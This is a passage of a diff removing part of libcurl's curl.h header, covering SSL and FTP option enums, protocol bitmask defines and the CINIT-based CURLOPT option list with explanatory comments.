-                          const struct curl_khkey *knownkey, /* known */
-                          const struct curl_khkey *foundkey, /* found */
-                          enum curl_khmatch, /* libcurl's view on the keys */
-                          void *clientp); /* custom pointer passed from app */
-
-/* parameter for the CURLOPT_USE_SSL option */
-typedef enum {
-  CURLUSESSL_NONE,    /* do not attempt to use SSL */
-  CURLUSESSL_TRY,     /* try using SSL, proceed anyway otherwise */
-  CURLUSESSL_CONTROL, /* SSL for the control connection or fail */
-  CURLUSESSL_ALL,     /* SSL for all communication or fail */
-  CURLUSESSL_LAST     /* not an option, never use */
-} curl_usessl;
-
-/* Definition of bits for the CURLOPT_SSL_OPTIONS argument: */
-
-/* - ALLOW_BEAST tells libcurl to allow the BEAST SSL vulnerability in the
-   name of improving interoperability with older servers. Some SSL libraries
-   have introduced work-arounds for this flaw but those work-arounds sometimes
-   make the SSL communication fail. To regain functionality with those broken
-   servers, a user can this way allow the vulnerability back. */
-#define CURLSSLOPT_ALLOW_BEAST (1<<0)
-
-/* - NO_REVOKE tells libcurl to disable certificate revocation checks for those
-   SSL backends where such behavior is present. */
-#define CURLSSLOPT_NO_REVOKE (1<<1)
-
-/* The default connection attempt delay in milliseconds for happy eyeballs.
-   CURLOPT_HAPPY_EYEBALLS_TIMEOUT_MS.3 and happy-eyeballs-timeout-ms.d document
-   this value, keep them in sync. */
-#define CURL_HET_DEFAULT 200L
-
-#ifndef CURL_NO_OLDIES /* define this to test if your app builds with all
-                          the obsolete stuff removed! */
-
-/* Backwards compatibility with older names */
-/* These are scheduled to disappear by 2009 */
-
-#define CURLFTPSSL_NONE CURLUSESSL_NONE
-#define CURLFTPSSL_TRY CURLUSESSL_TRY
-#define CURLFTPSSL_CONTROL CURLUSESSL_CONTROL
-#define CURLFTPSSL_ALL CURLUSESSL_ALL
-#define CURLFTPSSL_LAST CURLUSESSL_LAST
-#define curl_ftpssl curl_usessl
-#endif /*!CURL_NO_OLDIES*/
-
-/* parameter for the CURLOPT_FTP_SSL_CCC option */
-typedef enum {
-  CURLFTPSSL_CCC_NONE,    /* do not send CCC */
-  CURLFTPSSL_CCC_PASSIVE, /* Let the server initiate the shutdown */
-  CURLFTPSSL_CCC_ACTIVE,  /* Initiate the shutdown */
-  CURLFTPSSL_CCC_LAST     /* not an option, never use */
-} curl_ftpccc;
-
-/* parameter for the CURLOPT_FTPSSLAUTH option */
-typedef enum {
-  CURLFTPAUTH_DEFAULT, /* let libcurl decide */
-  CURLFTPAUTH_SSL,     /* use "AUTH SSL" */
-  CURLFTPAUTH_TLS,     /* use "AUTH TLS" */
-  CURLFTPAUTH_LAST /* not an option, never use */
-} curl_ftpauth;
-
-/* parameter for the CURLOPT_FTP_CREATE_MISSING_DIRS option */
-typedef enum {
-  CURLFTP_CREATE_DIR_NONE,  /* do NOT create missing dirs! */
-  CURLFTP_CREATE_DIR,       /* (FTP/SFTP) if CWD fails, try MKD and then CWD
-                               again if MKD succeeded, for SFTP this does
-                               similar magic */
-  CURLFTP_CREATE_DIR_RETRY, /* (FTP only) if CWD fails, try MKD and then CWD
-                               again even if MKD failed! */
-  CURLFTP_CREATE_DIR_LAST   /* not an option, never use */
-} curl_ftpcreatedir;
-
-/* parameter for the CURLOPT_FTP_FILEMETHOD option */
-typedef enum {
-  CURLFTPMETHOD_DEFAULT,   /* let libcurl pick */
-  CURLFTPMETHOD_MULTICWD,  /* single CWD operation for each path part */
-  CURLFTPMETHOD_NOCWD,     /* no CWD at all */
-  CURLFTPMETHOD_SINGLECWD, /* one CWD to full dir, then work on file */
-  CURLFTPMETHOD_LAST       /* not an option, never use */
-} curl_ftpmethod;
-
-/* bitmask defines for CURLOPT_HEADEROPT */
-#define CURLHEADER_UNIFIED  0
-#define CURLHEADER_SEPARATE (1<<0)
-
-/* CURLPROTO_ defines are for the CURLOPT_*PROTOCOLS options */
-#define CURLPROTO_HTTP   (1<<0)
-#define CURLPROTO_HTTPS  (1<<1)
-#define CURLPROTO_FTP    (1<<2)
-#define CURLPROTO_FTPS   (1<<3)
-#define CURLPROTO_SCP    (1<<4)
-#define CURLPROTO_SFTP   (1<<5)
-#define CURLPROTO_TELNET (1<<6)
-#define CURLPROTO_LDAP   (1<<7)
-#define CURLPROTO_LDAPS  (1<<8)
-#define CURLPROTO_DICT   (1<<9)
-#define CURLPROTO_FILE   (1<<10)
-#define CURLPROTO_TFTP   (1<<11)
-#define CURLPROTO_IMAP   (1<<12)
-#define CURLPROTO_IMAPS  (1<<13)
-#define CURLPROTO_POP3   (1<<14)
-#define CURLPROTO_POP3S  (1<<15)
-#define CURLPROTO_SMTP   (1<<16)
-#define CURLPROTO_SMTPS  (1<<17)
-#define CURLPROTO_RTSP   (1<<18)
-#define CURLPROTO_RTMP   (1<<19)
-#define CURLPROTO_RTMPT  (1<<20)
-#define CURLPROTO_RTMPE  (1<<21)
-#define CURLPROTO_RTMPTE (1<<22)
-#define CURLPROTO_RTMPS  (1<<23)
-#define CURLPROTO_RTMPTS (1<<24)
-#define CURLPROTO_GOPHER (1<<25)
-#define CURLPROTO_SMB    (1<<26)
-#define CURLPROTO_SMBS   (1<<27)
-#define CURLPROTO_ALL    (~0) /* enable everything */
-
-/* long may be 32 or 64 bits, but we should never depend on anything else
-   but 32 */
-#define CURLOPTTYPE_LONG          0
-#define CURLOPTTYPE_OBJECTPOINT   10000
-#define CURLOPTTYPE_STRINGPOINT   10000
-#define CURLOPTTYPE_FUNCTIONPOINT 20000
-#define CURLOPTTYPE_OFF_T         30000
-
-/* *STRINGPOINT is an alias for OBJECTPOINT to allow tools to extract the
-   string options from the header file */
-
-/* name is uppercase CURLOPT_<name>,
-   type is one of the defined CURLOPTTYPE_<type>
-   number is unique identifier */
-#ifdef CINIT
-#undef CINIT
-#endif
-
-#ifdef CURL_ISOCPP
-#define CINIT(na,t,nu) CURLOPT_ ## na = CURLOPTTYPE_ ## t + nu
-#else
-/* The macro "##" is ISO C, we assume pre-ISO C doesn't support it. */
-#define LONG          CURLOPTTYPE_LONG
-#define OBJECTPOINT   CURLOPTTYPE_OBJECTPOINT
-#define STRINGPOINT   CURLOPTTYPE_OBJECTPOINT
-#define FUNCTIONPOINT CURLOPTTYPE_FUNCTIONPOINT
-#define OFF_T         CURLOPTTYPE_OFF_T
-#define CINIT(name,type,number) CURLOPT_/**/name = type + number
-#endif
-
-/*
- * This macro-mania below setups the CURLOPT_[what] enum, to be used with
- * curl_easy_setopt(). The first argument in the CINIT() macro is the [what]
- * word.
- */
-
-typedef enum {
-  /* This is the FILE * or void * the regular output should be written to. */
-  CINIT(WRITEDATA, OBJECTPOINT, 1),
-
-  /* The full URL to get/put */
-  CINIT(URL, STRINGPOINT, 2),
-
-  /* Port number to connect to, if other than default. */
-  CINIT(PORT, LONG, 3),
-
-  /* Name of proxy to use. */
-  CINIT(PROXY, STRINGPOINT, 4),
-
-  /* "user:password;options" to use when fetching. */
-  CINIT(USERPWD, STRINGPOINT, 5),
-
-  /* "user:password" to use with proxy. */
-  CINIT(PROXYUSERPWD, STRINGPOINT, 6),
-
-  /* Range to get, specified as an ASCII string. */
-  CINIT(RANGE, STRINGPOINT, 7),
-
-  /* not used */
-
-  /* Specified file stream to upload from (use as input): */
-  CINIT(READDATA, OBJECTPOINT, 9),
-
-  /* Buffer to receive error messages in, must be at least CURL_ERROR_SIZE
-   * bytes big. */
-  CINIT(ERRORBUFFER, OBJECTPOINT, 10),
-
-  /* Function that will be called to store the output (instead of fwrite). The
-   * parameters will use fwrite() syntax, make sure to follow them. */
-  CINIT(WRITEFUNCTION, FUNCTIONPOINT, 11),
-
-  /* Function that will be called to read the input (instead of fread). The
-   * parameters will use fread() syntax, make sure to follow them. */
-  CINIT(READFUNCTION, FUNCTIONPOINT, 12),
-
-  /* Time-out the read operation after this amount of seconds */
-  CINIT(TIMEOUT, LONG, 13),
-
-  /* If the CURLOPT_INFILE is used, this can be used to inform libcurl about
-   * how large the file being sent really is. That allows better error
-   * checking and better verifies that the upload was successful. -1 means
-   * unknown size.
-   *
-   * For large file support, there is also a _LARGE version of the key
-   * which takes an off_t type, allowing platforms with larger off_t
-   * sizes to handle larger files.  See below for INFILESIZE_LARGE.
-   */
-  CINIT(INFILESIZE, LONG, 14),
-
-  /* POST static input fields. */
-  CINIT(POSTFIELDS, OBJECTPOINT, 15),
-
-  /* Set the referrer page (needed by some CGIs) */
-  CINIT(REFERER, STRINGPOINT, 16),
-
-  /* Set the FTP PORT string (interface name, named or numerical IP address)
-     Use i.e '-' to use default address. */
-  CINIT(FTPPORT, STRINGPOINT, 17),
-
-  /* Set the User-Agent string (examined by some CGIs) */
-  CINIT(USERAGENT, STRINGPOINT, 18),
-
-  /* If the download receives less than "low speed limit" bytes/second
-   * during "low speed time" seconds, the operations is aborted.
-   * You could i.e if you have a pretty high speed connection, abort if
-   * it is less than 2000 bytes/sec during 20 seconds.
-   */
-
-  /* Set the "low speed limit" */
-  CINIT(LOW_SPEED_LIMIT, LONG, 19),
-
-  /* Set the "low speed time" */
-  CINIT(LOW_SPEED_TIME, LONG, 20),
-
-  /* Set the continuation offset.
-   *
-   * Note there is also a _LARGE version of this key which uses
-   * off_t types, allowing for large file offsets on platforms which
-   * use larger-than-32-bit off_t's.  Look below for RESUME_FROM_LARGE.
-   */
-  CINIT(RESUME_FROM, LONG, 21),
-
-  /* Set cookie in request: */
-  CINIT(COOKIE, STRINGPOINT, 22),
-
-  /* This points to a linked list of headers, struct curl_slist kind. This
-     list is also used for RTSP (in spite of its name) */
-  CINIT(HTTPHEADER, OBJECTPOINT, 23),
-
-  /* This points to a linked list of post entries, struct curl_httppost */
-  CINIT(HTTPPOST, OBJECTPOINT, 24),
-
-  /* name of the file keeping your private SSL-certificate */
-  CINIT(SSLCERT, STRINGPOINT, 25),
-
-  /* password for the SSL or SSH private key */
-  CINIT(KEYPASSWD, STRINGPOINT, 26),
-
-  /* send TYPE parameter? */
-  CINIT(CRLF, LONG, 27),
-
-  /* send linked-list of QUOTE commands */
-  CINIT(QUOTE, OBJECTPOINT, 28),
-
-  /* send FILE * or void * to store headers to, if you use a callback it
-     is simply passed to the callback unmodified */
-  CINIT(HEADERDATA, OBJECTPOINT, 29),
-
-  /* point to a file to read the initial cookies from, also enables
-     "cookie awareness" */
-  CINIT(COOKIEFILE, STRINGPOINT, 31),
-
-  /* What version to specifically try to use.
-     See CURL_SSLVERSION defines below. */
-  CINIT(SSLVERSION, LONG, 32),
-
-  /* What kind of HTTP time condition to use, see defines */
-  CINIT(TIMECONDITION, LONG, 33),
-
-  /* Time to use with the above condition. Specified in number of seconds
-     since 1 Jan 1970 */
-  CINIT(TIMEVALUE, LONG, 34),
-
-  /* 35 = OBSOLETE */
-
-  /* Custom request, for customizing the get command like
-     HTTP: DELETE, TRACE and others
-     FTP: to use a different list command
-     */
-  CINIT(CUSTOMREQUEST, STRINGPOINT, 36),
-
-  /* FILE handle to use instead of stderr */
-  CINIT(STDERR, OBJECTPOINT, 37),
-
-  /* 38 is not used */
-
-  /* send linked-list of post-transfer QUOTE commands */
-  CINIT(POSTQUOTE, OBJECTPOINT, 39),
-
-  CINIT(OBSOLETE40, OBJECTPOINT, 40), /* OBSOLETE, do not use! */
-
-  CINIT(VERBOSE, LONG, 41),      /* talk a lot */
-  CINIT(HEADER, LONG, 42),       /* throw the header out too */
-  CINIT(NOPROGRESS, LONG, 43),   /* shut off the progress meter */
-  CINIT(NOBODY, LONG, 44),       /* use HEAD to get http document */
-  CINIT(FAILONERROR, LONG, 45),  /* no output on http error codes >= 400 */
-  CINIT(UPLOAD, LONG, 46),       /* this is an upload */
-  CINIT(POST, LONG, 47),         /* HTTP POST method */
-  CINIT(DIRLISTONLY, LONG, 48),  /* bare names when listing directories */
-
-  CINIT(APPEND, LONG, 50),       /* Append instead of overwrite on upload! */
-
-  /* Specify whether to read the user+password from the .netrc or the URL.
-   * This must be one of the CURL_NETRC_* enums below. */
-  CINIT(NETRC, LONG, 51),
-
-  CINIT(FOLLOWLOCATION, LONG, 52),  /* use Location: Luke! */
-
-  CINIT(TRANSFERTEXT, LONG, 53), /* transfer data in text/ASCII format */
-  CINIT(PUT, LONG, 54),          /* HTTP PUT */
-
-  /* 55 = OBSOLETE */
-
-  /* DEPRECATED
-   * Function that will be called instead of the internal progress display
-   * function. This function should be defined as the curl_progress_callback
-   * prototype defines. */
-  CINIT(PROGRESSFUNCTION, FUNCTIONPOINT, 56),
-
-  /* Data passed to the CURLOPT_PROGRESSFUNCTION and CURLOPT_XFERINFOFUNCTION
-     callbacks */
-  CINIT(PROGRESSDATA, OBJECTPOINT, 57),
-#define CURLOPT_XFERINFODATA CURLOPT_PROGRESSDATA
-
-  /* We want the referrer field set automatically when following locations */
-  CINIT(AUTOREFERER, LONG, 58),
-
-  /* Port of the proxy, can be set in the proxy string as well with:
-     "[host]:[port]" */
-  CINIT(PROXYPORT, LONG, 59),
-
-  /* size of the POST input data, if strlen() is not good to use */
-  CINIT(POSTFIELDSIZE, LONG, 60),
-
-  /* tunnel non-http operations through a HTTP proxy */
-  CINIT(HTTPPROXYTUNNEL, LONG, 61),
-
-  /* Set the interface string to use as outgoing network interface */
-  CINIT(INTERFACE, STRINGPOINT, 62),
-
-  /* Set the krb4/5 security level, this also enables krb4/5 awareness.  This
-   * is a string, 'clear', 'safe', 'confidential' or 'private'.  If the string
-   * is set but doesn't match one of these, 'private' will be used.  */
-  CINIT(KRBLEVEL, STRINGPOINT, 63),
-
-  /* Set if we should verify the peer in ssl handshake, set 1 to verify. */
-  CINIT(SSL_VERIFYPEER, LONG, 64),
-
-  /* The CApath or CAfile used to validate the peer certificate
-     this option is used only if SSL_VERIFYPEER is true */
-  CINIT(CAINFO, STRINGPOINT, 65),
-
-  /* 66 = OBSOLETE */
-  /* 67 = OBSOLETE */
-
-  /* Maximum number of http redirects to follow */
-  CINIT(MAXREDIRS, LONG, 68),
-
-  /* Pass a long set to 1 to get the date of the requested document (if
-     possible)! Pass a zero to shut it off. */
-  CINIT(FILETIME, LONG, 69),
-
-  /* This points to a linked list of telnet options */
-  CINIT(TELNETOPTIONS, OBJECTPOINT, 70),
-
-  /* Max amount of cached alive connections */
-  CINIT(MAXCONNECTS, LONG, 71),
-
-  CINIT(OBSOLETE72, LONG, 72), /* OBSOLETE, do not use! */
-
-  /* 73 = OBSOLETE */
-
-  /* Set to explicitly use a new connection for the upcoming transfer.
-     Do not use this unless you're absolutely sure of this, as it makes the
-     operation slower and is less friendly for the network. */
-  CINIT(FRESH_CONNECT, LONG, 74),
-
-  /* Set to explicitly forbid the upcoming transfer's connection to be re-used
-     when done. Do not use this unless you're absolutely sure of this, as it
-     makes the operation slower and is less friendly for the network. */
-  CINIT(FORBID_REUSE, LONG, 75),
-
-  /* Set to a file name that contains random data for libcurl to use to
-     seed the random engine when doing SSL connects. */
-  CINIT(RANDOM_FILE, STRINGPOINT, 76),
-
-  /* Set to the Entropy Gathering Daemon socket pathname */
-  CINIT(EGDSOCKET, STRINGPOINT, 77),
-
-  /* Time-out connect operations after this amount of seconds, if connects are
-     OK within this time, then fine... This only aborts the connect phase. */
-  CINIT(CONNECTTIMEOUT, LONG, 78),
-
-  /* Function that will be called to store headers (instead of fwrite). The
-   * parameters will use fwrite() syntax, make sure to follow them. */
-  CINIT(HEADERFUNCTION, FUNCTIONPOINT, 79),
-
-  /* Set this to force the HTTP request to get back to GET. Only really usable
-     if POST, PUT or a custom request have been used first.
-   */
-  CINIT(HTTPGET, LONG, 80),
-
-  /* Set if we should verify the Common name from the peer certificate in ssl
-   * handshake, set 1 to check existence, 2 to ensure that it matches the
-   * provided hostname. */
-  CINIT(SSL_VERIFYHOST, LONG, 81),
-
-  /* Specify which file name to write all known cookies in after completed
-     operation. Set file name to "-" (dash) to make it go to stdout. */
-  CINIT(COOKIEJAR, STRINGPOINT, 82),
-
-  /* Specify which SSL ciphers to use */
-  CINIT(SSL_CIPHER_LIST, STRINGPOINT, 83),
-
-  /* Specify which HTTP version to use! This must be set to one of the
-     CURL_HTTP_VERSION* enums set below. */
-  CINIT(HTTP_VERSION, LONG, 84),
-
-  /* Specifically switch on or off the FTP engine's use of the EPSV command. By
-     default, that one will always be attempted before the more traditional
-     PASV command. */
-  CINIT(FTP_USE_EPSV, LONG, 85),
-
-  /* type of the file keeping your SSL-certificate ("DER", "PEM", "ENG") */
-  CINIT(SSLCERTTYPE, STRINGPOINT, 86),
-
-  /* name of the file keeping your private SSL-key */
-  CINIT(SSLKEY, STRINGPOINT, 87),
-
-  /* type of the file keeping your private SSL-key ("DER", "PEM", "ENG") */
-  CINIT(SSLKEYTYPE, STRINGPOINT, 88),
-
-  /* crypto engine for the SSL-sub system */
-  CINIT(SSLENGINE, STRINGPOINT, 89),
-
-  /* set the crypto engine for the SSL-sub system as default
-     the param has no meaning...
-   */
-  CINIT(SSLENGINE_DEFAULT, LONG, 90),
-
-  /* Non-zero value means to use the global dns cache */
-  CINIT(DNS_USE_GLOBAL_CACHE, LONG, 91), /* DEPRECATED, do not use! */
-
-  /* DNS cache timeout */
-  CINIT(DNS_CACHE_TIMEOUT, LONG, 92),
-
-  /* send linked-list of pre-transfer QUOTE commands */
-  CINIT(PREQUOTE, OBJECTPOINT, 93),
-
-  /* set the debug function */
-  CINIT(DEBUGFUNCTION, FUNCTIONPOINT, 94),
-
-  /* set the data for the debug function */
-  CINIT(DEBUGDATA, OBJECTPOINT, 95),
-
-  /* mark this as start of a cookie session */
-  CINIT(COOKIESESSION, LONG, 96),
-
-  /* The CApath directory used to validate the peer certificate
-     this option is used only if SSL_VERIFYPEER is true */
-  CINIT(CAPATH, STRINGPOINT, 97),
-
-  /* Instruct libcurl to use a smaller receive buffer */
-  CINIT(BUFFERSIZE, LONG, 98),
-
-  /* Instruct libcurl to not use any signal/alarm handlers, even when using
-     timeouts. This option is useful for multi-threaded applications.
-     See libcurl-the-guide for more background information. */
-  CINIT(NOSIGNAL, LONG, 99),
-
-  /* Provide a CURLShare for mutexing non-ts data */
-  CINIT(SHARE, OBJECTPOINT, 100),
-
-  /* indicates type of proxy. accepted values are CURLPROXY_HTTP (default),
-     CURLPROXY_HTTPS, CURLPROXY_SOCKS4, CURLPROXY_SOCKS4A and
-     CURLPROXY_SOCKS5. */
-  CINIT(PROXYTYPE, LONG, 101),
-
-  /* Set the Accept-Encoding string. Use this to tell a server you would like
-     the response to be compressed. Before 7.21.6, this was known as
-     CURLOPT_ENCODING */
-  CINIT(ACCEPT_ENCODING, STRINGPOINT, 102),
-
-  /* Set pointer to private data */
-  CINIT(PRIVATE, OBJECTPOINT, 103),
-
-  /* Set aliases for HTTP 200 in the HTTP Response header */
-  CINIT(HTTP200ALIASES, OBJECTPOINT, 104),
-
-  /* Continue to send authentication (user+password) when following locations,
-     even when hostname changed. This can potentially send off the name
-     and password to whatever host the server decides. */
-  CINIT(UNRESTRICTED_AUTH, LONG, 105),
-
-  /* Specifically switch on or off the FTP engine's use of the EPRT command (
-     it also disables the LPRT attempt). By default, those ones will always be
-     attempted before the good old traditional PORT command. */
-  CINIT(FTP_USE_EPRT, LONG, 106),
-
-  /* Set this to a bitmask value to enable the particular authentications
-     methods you like. Use this in combination with CURLOPT_USERPWD.
-     Note that setting multiple bits may cause extra network round-trips. */
-  CINIT(HTTPAUTH, LONG, 107),
-
-  /* Set the ssl context callback function, currently only for OpenSSL ssl_ctx
-     in second argument. The function must be matching the
-     curl_ssl_ctx_callback proto. */
-  CINIT(SSL_CTX_FUNCTION, FUNCTIONPOINT, 108),
-
-  /* Set the userdata for the ssl context callback function's third
-     argument */
-  CINIT(SSL_CTX_DATA, OBJECTPOINT, 109),
-
-  /* FTP Option that causes missing dirs to be created on the remote server.
-     In 7.19.4 we introduced the convenience enums for this option using the
-     CURLFTP_CREATE_DIR prefix.
-  */
-  CINIT(FTP_CREATE_MISSING_DIRS, LONG, 110),
-
-  /* Set this to a bitmask value to enable the particular authentications
-     methods you like. Use this in combination with CURLOPT_PROXYUSERPWD.
-     Note that setting multiple bits may cause extra network round-trips. */
-  CINIT(PROXYAUTH, LONG, 111),
-
-  /* FTP option that changes the timeout, in seconds, associated with
-     getting a response.  This is different from transfer timeout time and
-     essentially places a demand on the FTP server to acknowledge commands
-     in a timely manner. */
-  CINIT(FTP_RESPONSE_TIMEOUT, LONG, 112),
-#define CURLOPT_SERVER_RESPONSE_TIMEOUT CURLOPT_FTP_RESPONSE_TIMEOUT
-
-  /* Set this option to one of the CURL_IPRESOLVE_* defines (see below) to
-     tell libcurl to resolve names to those IP versions only. This only has
-     affect on systems with support for more than one, i.e IPv4 _and_ IPv6. */
-  CINIT(IPRESOLVE, LONG, 113),
-
-  /* Set this option to limit the size of a file that will be downloaded from
-     an HTTP or FTP server.
-
-     Note there is also _LARGE version which adds large file support for
-     platforms which have larger off_t sizes.  See MAXFILESIZE_LARGE below. */
-  CINIT(MAXFILESIZE, LONG, 114),
-
-  /* See the comment for INFILESIZE above, but in short, specifies
-   * the size of the file being uploaded.  -1 means unknown.
-   */
-  CINIT(INFILESIZE_LARGE, OFF_T, 115),
-
-  /* Sets the continuation offset.  There is also a LONG version of this;
-   * look above for RESUME_FROM.
-   */
-  CINIT(RESUME_FROM_LARGE, OFF_T, 116),
-
-  /* Sets the maximum size of data that will be downloaded from
-   * an HTTP or FTP server.  See MAXFILESIZE above for the LONG version.
-   */
-  CINIT(MAXFILESIZE_LARGE, OFF_T, 117),
-
-  /* Set this option to the file name of your .netrc file you want libcurl
-     to parse (using the CURLOPT_NETRC option). If not set, libcurl will do
-     a poor attempt to find the user's home directory and check for a .netrc
-     file in there. */
-  CINIT(NETRC_FILE, STRINGPOINT, 118),
-
-  /* Enable SSL/TLS for FTP, pick one of:
-     CURLUSESSL_TRY     - try using SSL, proceed anyway otherwise
-     CURLUSESSL_CONTROL - SSL for the control connection or fail
-     CURLUSESSL_ALL     - SSL for all communication or fail
-  */
-  CINIT(USE_SSL, LONG, 119),
-
-  /* The _LARGE version of the standard POSTFIELDSIZE option */
-  CINIT(POSTFIELDSIZE_LARGE, OFF_T, 120),
-
-  /* Enable/disable the TCP Nagle algorithm */
-  CINIT(TCP_NODELAY, LONG, 121),
-
-  /* 122 OBSOLETE, used in 7.12.3. Gone in 7.13.0 */
-  /* 123 OBSOLETE. Gone in 7.16.0 */
-  /* 124 OBSOLETE, used in 7.12.3. Gone in 7.13.0 */
-  /* 125 OBSOLETE, used in 7.12.3. Gone in 7.13.0 */
-  /* 126 OBSOLETE, used in 7.12.3. Gone in 7.13.0 */
-  /* 127 OBSOLETE. Gone in 7.16.0 */
-  /* 128 OBSOLETE. Gone in 7.16.0 */
-
-  /* When FTP over SSL/TLS is selected (with CURLOPT_USE_SSL), this option
-     can be used to change libcurl's default action which is to first try
-     "AUTH SSL" and then "AUTH TLS" in this order, and proceed when a OK
-     response has been received.
-
-     Available parameters are:
-     CURLFTPAUTH_DEFAULT - let libcurl decide
-     CURLFTPAUTH_SSL     - try "AUTH SSL" first, then TLS
-     CURLFTPAUTH_TLS     - try "AUTH TLS" first, then SSL
-  */
-  CINIT(FTPSSLAUTH, LONG, 129),
-
-  CINIT(IOCTLFUNCTION, FUNCTIONPOINT, 130),
-  CINIT(IOCTLDATA, OBJECTPOINT, 131),
-
-  /* 132 OBSOLETE. Gone in 7.16.0 */
-  /* 133 OBSOLETE. Gone in 7.16.0 */
-
-  /* zero terminated string for pass on to the FTP server when asked for
-     "account" info */
-  CINIT(FTP_ACCOUNT, STRINGPOINT, 134),
-
-  /* feed cookie into cookie engine */
-  CINIT(COOKIELIST, STRINGPOINT, 135),
-
-  /* ignore Content-Length */
-  CINIT(IGNORE_CONTENT_LENGTH, LONG, 136),
-
-  /* Set to non-zero to skip the IP address received in a 227 PASV FTP server
-     response. Typically used for FTP-SSL purposes but is not restricted to
-     that. libcurl will then instead use the same IP address it used for the
-     control connection. */
-  CINIT(FTP_SKIP_PASV_IP, LONG, 137),
-
-  /* Select "file method" to use when doing FTP, see the curl_ftpmethod
-     above. */
-  CINIT(FTP_FILEMETHOD, LONG, 138),
-
-  /* Local port number to bind the socket to */
-  CINIT(LOCALPORT, LONG, 139),
-
-  /* Number of ports to try, including the first one set with LOCALPORT.
-     Thus, setting it to 1 will make no additional attempts but the first.
-  */
-  CINIT(LOCALPORTRANGE, LONG, 140),
-
-  /* no transfer, set up connection and let application use the socket by
-     extracting it with CURLINFO_LASTSOCKET */
-  CINIT(CONNECT_ONLY, LONG, 141),
-
-  /* Function that will be called to convert from the
-     network encoding (instead of using the iconv calls in libcurl) */
-  CINIT(CONV_FROM_NETWORK_FUNCTION, FUNCTIONPOINT, 142),
-
-  /* Function that will be called to convert to the
-     network encoding (instead of using the iconv calls in libcurl) */
-  CINIT(CONV_TO_NETWORK_FUNCTION, FUNCTIONPOINT, 143),
-
-  /* Function that will be called to convert from UTF8
-     (instead of using the iconv calls in libcurl)
-     Note that this is used only for SSL certificate processing */
-  CINIT(CONV_FROM_UTF8_FUNCTION, FUNCTIONPOINT, 144),
-
-  /* if the connection proceeds too quickly then need to slow it down */
-  /* limit-rate: maximum number of bytes per second to send or receive */
-  CINIT(MAX_SEND_SPEED_LARGE, OFF_T, 145),
-  CINIT(MAX_RECV_SPEED_LARGE, OFF_T, 146),
-
-  /* Pointer to command string to send if USER/PASS fails. */
-  CINIT(FTP_ALTERNATIVE_TO_USER, STRINGPOINT, 147),
-
-  /* callback function for setting socket options */
-  CINIT(SOCKOPTFUNCTION, FUNCTIONPOINT, 148),
-  CINIT(SOCKOPTDATA, OBJECTPOINT, 149),
-
-  /* set to 0 to disable session ID re-use for this transfer, default is
-     enabled (== 1) */
-  CINIT(SSL_SESSIONID_CACHE, LONG, 150),
-
-  /* allowed SSH authentication methods */
-  CINIT(SSH_AUTH_TYPES, LONG, 151),
-
-  /* Used by scp/sftp to do public/private key authentication */
-  CINIT(SSH_PUBLIC_KEYFILE, STRINGPOINT, 152),
-  CINIT(SSH_PRIVATE_KEYFILE, STRINGPOINT, 153),
-
-  /* Send CCC (Clear Command Channel) after authentication */
-  CINIT(FTP_SSL_CCC, LONG, 154),
-
-  /* Same as TIMEOUT and CONNECTTIMEOUT, but with ms resolution */
-  CINIT(TIMEOUT_MS, LONG, 155),
-  CINIT(CONNECTTIMEOUT_MS, LONG, 156),
-
-  /* set to zero to disable the libcurl's decoding and thus pass the raw body
-     data to the application even when it is encoded/compressed */
-  CINIT(HTTP_TRANSFER_DECODING, LONG, 157),
-  CINIT(HTTP_CONTENT_DECODING, LONG, 158),
-
-  /* Permission used when creating new files and directories on the remote
-     server for protocols that support it, SFTP/SCP/FILE */
-  CINIT(NEW_FILE_PERMS, LONG, 159),
-  CINIT(NEW_DIRECTORY_PERMS, LONG, 160),
-
-  /* Set the behaviour of POST when redirecting. Values must be set to one
-     of CURL_REDIR* defines below. This used to be called CURLOPT_POST301 */
-  CINIT(POSTREDIR, LONG, 161),
-
-  /* used by scp/sftp to verify the host's public key */
-  CINIT(SSH_HOST_PUBLIC_KEY_MD5, STRINGPOINT, 162),
-
-  /* Callback function for opening socket (instead of socket(2)). Optionally,
-     callback is able change the address or refuse to connect returning
-     CURL_SOCKET_BAD.  The callback should have type
-     curl_opensocket_callback */
-  CINIT(OPENSOCKETFUNCTION, FUNCTIONPOINT, 163),
-  CINIT(OPENSOCKETDATA, OBJECTPOINT, 164),
-
-  /* POST volatile input fields. */
-  CINIT(COPYPOSTFIELDS, OBJECTPOINT, 165),
-
-  /* set transfer mode (;type=<a|i>) when doing FTP via an HTTP proxy */
-  CINIT(PROXY_TRANSFER_MODE, LONG, 166),
-
-  /* Callback function for seeking in the input stream */
-  CINIT(SEEKFUNCTION, FUNCTIONPOINT, 167),
-  CINIT(SEEKDATA, OBJECTPOINT, 168),
-
-  /* CRL file */
-  CINIT(CRLFILE, STRINGPOINT, 169),
-
-  /* Issuer certificate */
-  CINIT(ISSUERCERT, STRINGPOINT, 170),
-
-  /* (IPv6) Address scope */
-  CINIT(ADDRESS_SCOPE, LONG, 171),
-
-  /* Collect certificate chain info and allow it to get retrievable with
-     CURLINFO_CERTINFO after the transfer is complete. */
-  CINIT(CERTINFO, LONG, 172),
-
-  /* "name" and "pwd" to use when fetching. */
-  CINIT(USERNAME, STRINGPOINT, 173),
-  CINIT(PASSWORD, STRINGPOINT, 174),
-
-    /* "name" and "pwd" to use with Proxy when fetching. */
-  CINIT(PROXYUSERNAME, STRINGPOINT, 175),
-  CINIT(PROXYPASSWORD, STRINGPOINT, 176),
-
-  /* Comma separated list of hostnames defining no-proxy zones. These should
-     match both hostnames directly, and hostnames within a domain. For
-     example, local.com will match local.com and www.local.com, but NOT
-     notlocal.com or www.notlocal.com. For compatibility with other
-     implementations of this, .local.com will be considered to be the same as
-     local.com. A single * is the only valid wildcard, and effectively
-     disables the use of proxy. */
-  CINIT(NOPROXY, STRINGPOINT, 177),
-
-  /* block size for TFTP transfers */
-  CINIT(TFTP_BLKSIZE, LONG, 178),
-
-  /* Socks Service */
-  CINIT(SOCKS5_GSSAPI_SERVICE, STRINGPOINT, 179), /* DEPRECATED, do not use! */
-
-  /* Socks Service */
-  CINIT(SOCKS5_GSSAPI_NEC, LONG, 180),
-
-  /* set the bitmask for the protocols that are allowed to be used for the
-     transfer, which thus helps the app which takes URLs from users or other
-     external inputs and want to restrict what protocol(s) to deal
-     with. Defaults to CURLPROTO_ALL. */
-  CINIT(PROTOCOLS, LONG, 181),
-
-  /* set the bitmask for the protocols that libcurl is allowed to follow to,
-     as a subset of the CURLOPT_PROTOCOLS ones. That means the protocol needs
-     to be set in both bitmasks to be allowed to get redirected to. Defaults
-     to all protocols except FILE and SCP. */
-  CINIT(REDIR_PROTOCOLS, LONG, 182),
-
